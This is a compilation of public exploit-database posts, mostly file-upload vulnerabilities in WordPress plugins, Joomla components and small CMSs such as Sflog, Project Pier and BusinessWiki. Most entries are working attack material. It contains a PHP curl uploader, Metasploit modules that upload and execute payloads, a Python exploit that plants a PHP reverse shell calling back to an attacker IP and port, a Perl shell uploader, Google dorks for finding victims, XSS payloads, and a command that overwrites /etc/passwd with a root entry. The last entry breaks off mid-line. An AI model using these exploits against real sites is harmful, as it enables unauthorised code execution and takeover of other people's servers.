##################################################
# Description : Wordpress Plugins - Front-end Editor Arbitrary File Upload Vulnerability
# Version : 2.2.1
# link : http://wordpress.org/extend/plugins/front-end-editor/
# Software : http://downloads.wordpress.org/plugin/front-end-editor.2.2.1.zip
# Date : 04-07-2012
# Google Dork : inurl:/wp-content/plugins/front-end-editor/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$headers = array("Content-Type: application/octet-stream",
"X-File-Name: lo.php");
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php phpinfo(); ?>");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wordpress/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/lo.php |
↧
WordPress Plugins – Front-end Editor Arbitrary File Upload Vulnerability
↧
WordPress Generic plugins Arbitrary File Upload (Metasploit)
## # $Id: wp_gupload.rb 2012-07-09 04:35:01Z KedAns-Dz $ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Generic plugins Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary PHP File Upload and Code Execution flaw in some WordPress blog software plugins. The vulnerability allows for arbitrary file upload and remote code execution POST Data to Vulnerable Script/File in the plugin. }, 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module 'License' => MSF_LICENSE, 'Version' => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best ! 'References' => [ 'URL', 'http://1337day.com/related/18686', 'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' ], 'Privileged' => false, 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', }, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jun 16 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]), OptString.new('PLUGIN', [true, "The Full URI path to Plugin and Vulnerable File", "/"]), OptString.new('UDP', [true, "Full Path After Upload", "/"]) # Example : # set TARGETURI http://127.0.0.1/wp # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php # set UDP wp-content/affiliate_images/ # set RHOST 127.0.0.1 # set PAYLOAD php/exec # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd # exploit ], self.class) end def check uri = datastore['TARGETURI'] plug = datastore['PLUGIN'] res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{plug}" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = datastore['TARGETURI'] plug = datastore['PLUGIN'] path = datastore['UDP'] peer = "#{rhost}:#{rport}" post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending PHP payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}'/'#{plug}", 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{path}'/'#{$1}.php" }) if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end |
↧
↧
WordPress editormonkey Arbitrary File Upload Vulnerability
######################################################################################## # # Exploit Title : Wordpress (editormonkey) Arbitrary File Upload Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://wordpress.org # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Powered By Wordpress" # ######################################################################################## # # Expl0iTs : # # http://target.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html # ######################################################################################## # # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - Net.Edit0r - A.Cr0x - G3n3rall - # # R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F () rid - joker_s - H4x0r - dr.tofan - skote_vahshat - # # d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy - Shekaf & All Members In IrIsT.Ir # ######################################################################################## |
↧
Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability
############################################################################
#
# Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability
#
# Google Dork: inurl:index.php?option=com_ksadvertiser
#
# Date: [12-07-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://www.insecurityperu.org/
#
# vendor Link: http://www.kiss-software.de
#
# Tested on: [Linux(arch)-Windows(7ultimate)]
#
1. Some pages require the Register
Registrese Algunas Paginas lo exigen
http://site/index.php?option=com_user&view=login
2. Go to the upload path
Dirijase a la ruta del upload
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif
4. Locate your file in the root / images/ksadvertiser/U0 -> this may vary
Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
http://site/images/ksadvertiser/U0/403.php.gif
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R" |
↧
WordPress Cimy User Extra Fields 2.3.7 Shell Upload
# Exploit Title: wordpress plugin Cimy User Extra Fields Arbitrary File Upload Vulnerability # Google Dork: inurl:"inurl:/wp-content/Cimy_User_Extra_Fields" # Date: 07/18/2012 # Author: Crim3R # plugin download Link : http://downloads.wordpress.org/plugin/cimy-user-extra-fields.2.3.7.zip # Version: 2.3.7 # Tested on: all ======================================== you can find avatar upload in Registration form with extra fields 0r User's profile with extra fields witch is available for all types of users. an attacker can upload shell in many ways like modifying Headers or ... shell access : http://wordpress/wp-content/Cimy_User_Extra_Fields/username/avatar.jpg.php ===============Crim3R@Att.Net=========== $home = http://Secure-Land.net thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini and all Secure-land Members... |
↧
↧
WordPress chenpress Plugin Arbitrary File Upload Vulnerability
######################################################################################## # # Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://wordpress.org # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:"wp-content/plugins/chenpress" # ######################################################################################## # # Expl0iTs : # # http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html # ######################################################################################## # # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F () rid # # H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy # # Siamak_Black - Shekaf & All Members In IrIsT.Ir # ######################################################################################## |
↧
WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
# Exploit Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
# Date: 7/23/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://mondaybynoon.com/
# Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip
# Version: 0.5.4.4
=====================
Vulnerability Details
=====================
Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:
filename.php.jpg
Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.
In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.
Example:
/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/
However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.
===================
Disclosure Timeline
===================
7/13/2012 - Vendor notified
7/23/2012 - Version 0.5.4.6 released
7/23/2012 - Public disclosure |
↧
BusinessWiki 2.5RC3 Stored XSS & Arbitrary File Upload
#!/usr/bin/python
'''
# Exploit Title: Stored XSS & Arbitrary File Upload Vulnerabilities in BusinessWiki.
# Date: 23/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://onbusinesswiki.com/
# Software Link: http://sourceforge.net/projects/businesswiki/files/
# Version: 2.5RC3
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar
About the Application:
======================
BusinessWiki is a Enterprise level Wiki available on GPL Licence. BusinessWiki bases on MediaWiki Core
Vulnerability Description
=========================
1. Stored XSS in Page Comments.
It is possible to inject malicious Javascript code into page comments
Steps to reproduce the issue:
1.1. Select a page.
1.2. At the bottom of the page insert the following Javascript payload into the "Comments" field: <script>alert("XSS")</script>
1.3. Click "Add".
1.4. XSS Should be triggered.
This XSS will execute on all users visiting this page.
2. Stored XSS In User Profile.
Steps to reproduce the issue:
2.1. Click on your uesr name at the top right of the page where it says "Logged in as: username"
2.2. Click on the "Contact Information" - "Edit this" link.
2.3. Vulnerable Fields: "Phones", "IMs", "Others" insert Javascript payload: <script>alert("XSS")</script>
2.4. Click the "Update" button.
2.5. Click the "See the changes" link,
2.6. The XSS Should be triggered.
This XSS will be triggered when users view your malicious profile via the "User directory".
3. Arbitrary File Upload.
BusinessWiki use FCKEditor, It is possible to use the following page to upload malicious files onto the server:
http://192.168.1.10/extensions/FCKeditor/fckeditor/editor/filemanager/connectors/uploadtest.html
Although FCKEditor restricts upload of certain file types it is possible to bypass this restriction.
A Proof of concept exploit code is provided.
'''
import urllib2, sys, random, string, time
print "################################################"
print "# BusinessWiki Arbitrary File Upload RCE POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "################################################\r\n"
if len(sys.argv) < 4:
print ('Usage: ' + sys.argv[0] + ' remote_host attacker_ip attacker_port')
print('e.g: ' + sys.argv[0] + ' http://example.com 192.68.1.10 4444')
sys.exit(1)
target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shell_sleep = 10
print "\n[*] Generating Random File Name..."
chars = string.ascii_uppercase + string.digits
file_name = ''.join(random.sample(chars ,6))
print "[+] File Name: " + file_name
data = '''
-----------------------------1655174106359
Content-Disposition: form-data; name="NewFile";''' + " filename=" + '"' + file_name + '.txt"' + "\n"
data += "Content-Type: text/plain\r\n"
data += '''
<?php
$addr=$_REQUEST['addr'];
$port=$_REQUEST['port'];
if (!($sock=fsockopen($addr,$port)))
die;
while (!feof($sock)) {
$cmd = fgets($sock);
$pipe = popen($cmd,'r');
while (!feof($pipe))
fwrite ($sock, fgets($pipe));
pclose($pipe);
}
fclose($sock);
?>
-----------------------------1655174106359--
'''
print "[*] Uploading Shell..."
url = (target + '/extensions/FCKeditor/fckeditor/editor/filemanager/connectors/php/upload.php?time=&CurrentFolder=/' + file_name + '.php%00')
headers = {'Content-Type' : 'multipart/form-data; boundary=---------------------------1655174106359'}
req = urllib2.Request (url ,data ,headers)
response = urllib2.urlopen(req)
print "[+] Please setup a netcat listener on port " + port + ", Shell will be triggered in " + str(shell_sleep) + " seconds..."
time.sleep(shell_sleep)
print "[+] Shell Location: " + (target + "/userfiles/" + file_name + ".php&addr=" + ip + "&port=" + port)
opener = urllib2.build_opener()
trigger = opener.open(target + "/userfiles/" + file_name + ".php?addr=" + ip + "&port=" + port)
print "[X] Bye..." |
↧
WordPress TDO Mini Forms Arbitrary File Upload
# Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability # Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index" # Date: 31/9/12 # Exploit Author: HodLuM # Vendor Homepage: unknown # Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/ # Version: All # Tested on: 2.x.x to 3.x.x # Email: h0dlmx@yahoo.com - hodlum@live.com ~#Exploit: site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= ~#Uploaded files go to: site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.* |
↧
↧
Sflog! CMS 1.0 Arbitrary File Upload
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of "admin:secret", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'dun', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '83767'], ['EDB', '19626'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => ['linux', 'php'], 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Jul 06 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']), OptString.new('USERNAME', [true, 'The username to login with', 'admin']), OptString.new('PASSWORD', [true, 'The password to login with', 'secret']) ], self.class) end def check target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") res = send_request_raw({'uri'=>"#{base}/index.php"}) if not res return Exploit::CheckCode::Unknown elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end # # Embed our binary in PHP, and then extract/execute it on the host. # def get_write_exec_payload(fname, data) p = Rex::Text.encode_base64(generate_payload_exe) php = %Q| <?php $f = fopen("#{fname}", "wb"); fwrite($f, base64_decode("#{p}")); fclose($f); exec("chmod 777 #{fname}"); exec("#{fname}"); ?> | php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') return php end def on_new_session(cli) if cli.type == "meterpreter" cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") end @clean_files.each do |f| print_status("#{@peer} - Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) else cli.shell_command_token("rm #{f}") end rescue ::Exception => e print_error("#{@peer} - Unable to remove #{f}: #{e.message}") end end end # # login unfortunately is needed, because we need to make sure blogID is set, and the upload # script (uploadContent.inc.php) doesn't actually do that, even though we can access it # directly. # def do_login(base) res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/login.php", 'vars_post' => { 'userID' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } }) if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/ return res.headers['Set-Cookie'] else return '' end end # # Upload our payload, and then execute it. # def upload_exec(cookie, base, php_fname, p) data = Rex::MIME::Message.new data.add_part('download', nil, nil, "form-data; name=\"blogID\"") data.add_part('7', nil, nil, "form-data; name=\"contentType\"") data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"") data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"") # The app doesn't really like the extra "\r\n", so we need to remove the newline. post_data = data.to_s post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}#{base}/admin/manage.php", 'Origin' => "http://#{rhost}" } }) if not res print_error("#{@peer} - No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" print_status("#{@peer} - Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") return end handler end def exploit @peer = "#{rhost}:#{rport}" target_uri.path << '/' if target_uri.path[-1,1] != '/' base = File.dirname("#{target_uri.path}.") print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? print_error("#{@peer} - Unable to login") return end php_fname = "#{Rex::Text.rand_text_alpha(5)}.php" @clean_files = [php_fname] case target['Platform'] when 'php' p = "<?php #{payload.encoded} ?>" when 'linux' bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin" @clean_files << bin_name bin = generate_payload_exe p = get_write_exec_payload("/tmp/#{bin_name}", bin) end upload_exec(cookie, base, php_fname, p) end end |
↧
Project Pier Arbitrary File Upload
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Project Pier Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Project Pier. The application's
uploading tool does not require any authentication, which allows a malicious user
to upload an arbitrary file onto the web server, and then cause remote code
execution by simply requesting it. This module is known to work against Apache
servers due to the way it handles an extension name, but the vulnerability may
not be exploitable on others.
},
'License' => MSF_LICENSE,
'Author' =>
[
'BlackHawk',
'sinn3r'
],
'References' =>
[
['OSVDB', '85881'],
['URL', 'http://packetstormsecurity.org/files/117070/ProjectPier-0.8.8-Shell-Upload.html']
],
'Platform' => ['linux', 'php'],
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Arch' => ARCH_CMD,
'Privileged' => false,
'DisclosureDate' => "Oct 8 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])
], self.class)
end
def check
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")
res = send_request_cgi(
{
'method' => 'GET',
'uri' => "#{base}/index.php",
'vars_get' =>
{
'c' => 'access',
'a' => 'login'
}
})
if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def get_write_exec_payload(fname, data)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("chmod 777 #{fname}");
exec("#{fname}");
?>
|
php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
return php
end
def on_new_session(cli)
if cli.type == "meterpreter"
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end
@clean_files.each do |f|
print_debug("#{@peer} - Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
cli.shell_command_token("rm #{f}")
end
print_debug("File removed: #{f}")
rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
end
end
end
def upload_php(base, fname, php_payload, folder_name)
data = Rex::MIME::Message.new
data.add_part(folder_name, nil, nil, 'form-data; name="folder"')
data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")
data.add_part('', nil, nil, 'form-data; name="part"')
data.add_part('Submit', nil, nil, 'form-data; name="submit"')
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/tools/upload_file.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
return res.body if res
end
def exec_php(base, body)
# Body example:
# 0 ./upload/test/test.txt-0001
uri = body.scan(/(\/.+$)/).flatten[0]
@clean_files << File.basename(uri)
res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
if res and res.code == 404
print_error("#{@peer} - The upload most likely failed")
return
end
handler
end
def exploit
@peer = "#{rhost}:#{rport}"
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")
folder_name = Rex::Text.rand_text_alpha(4)
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"
@clean_files = []
case target['Platform']
when 'php'
p = "<?php #{payload.encoded} ?>"
when 'linux'
bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
@clean_files << bin_name
bin = generate_payload_exe
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
res = upload_php(base, php_fname, p, folder_name)
if not res
print_error("#{@peer} - No response from server")
return
end
print_status("#{@peer} - Executing '#{php_fname}'...")
exec_php(base, res)
end
end |
↧
WordPress Daily Edition Mouss XSS / Disclosure / Shell Upload
------------------------- Affected products: ------------------------- Vulnerable are all versions of Daily Edition Mouss theme for WordPress (to SQLi, IL, XSS, FPD and to AoF, DoS, AFU only earlier versions are vulnerable). ---------- Details: ---------- Information Leakage (SQL DB Structure Extraction) (WASC-13): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php Leakage of SQL query with tables' names (including table prefix). XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss//fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/ Besides index.php there are also potentially FPD in other php-files of this theme. XSS (WASC-08): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http:// http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php AoF, DoS, AFU vulnerabilities are not working in last version of the theme (where I've tested them). It can be due to protection against AFU hole in TimThumb. But they must work in earlier versions of this theme. ------------ Timeline: ------------ 2013.01.13 - found vulnerabilities. 2013.01.14 - disclosed to the lists. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua |
↧
chillyCMS 1.3.0 Shell Upload / Access Bypass
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: http://www.youtube.com/watch?v=6B3rND9S75g
# Vulnerability
Failure to Restrict URL Access
chillyCMS uses 302 redirects to restrict access to the unautorized pages.
# Exploit
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/
# Vulnerability
Arbitrary File Upload
chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory
# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php
# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds back, exchanges few mails.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.
# How to reproduce
The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files. |
↧
↧
Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : 1337day.com 0
# 1 [+] Support e-mail : submit[at]1337day.com 1
# 0 0
# 1 ######################################### 1
# 0 I'm KedAns-Dz member from Inj3ct0r Team 1
# 1 ######################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Matterdaddy Market 1.4.2 <= (XSRF/FileUpload) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum
# Type : php - proof of concept - webapp 0day - remote
# Tested on : Windows7 (Fr)
# Vendor : [http://market.matterdaddy.com]
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
######## [ Proof / Exploit ] ################|=>
####[ (1) XSRF/HTML Injection ]=>
# http://127.0.0.1/market/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>
# Demo : http://demo.opensourcecms.com/fbcmarket/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>
####[ (2) File Upload .jpg ]=>
# go to : http://[target]/[path]/newItem.php?a=1
# add item info (title,name,price..etc) &..
# add u'r file (.jpg) and submited !
# Check your email and confirm u'r post ;) :p
# or use this perl script ============>
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
Content_Type => 'multipart/form-data',
Content =>
[
'md_title' => '1337day',
'md_description' => 'Inj3ct0r Exploit Database',
'md_price' => '0',
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
'city' => 'Hassi Messaoud',
'namer' => 'KedAns-Dz',
'category' => '4',
'filetoupload' => $file,
'filename' => 'k3dsh3ll.php;.jpg',
# to make this exploit as sqli change file name to :
# k3dsh3ll' [+ SQLi +].php.jpg
# use temperdata better ;)
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
####[ (3) SQL Injection ] ===>
# is Old 0day found by r4x0r4x (http://1337day.com/exploit/19635)
# p.o.c : /[path]/action.php?cp=1' [+ SQLi +]
# demo :
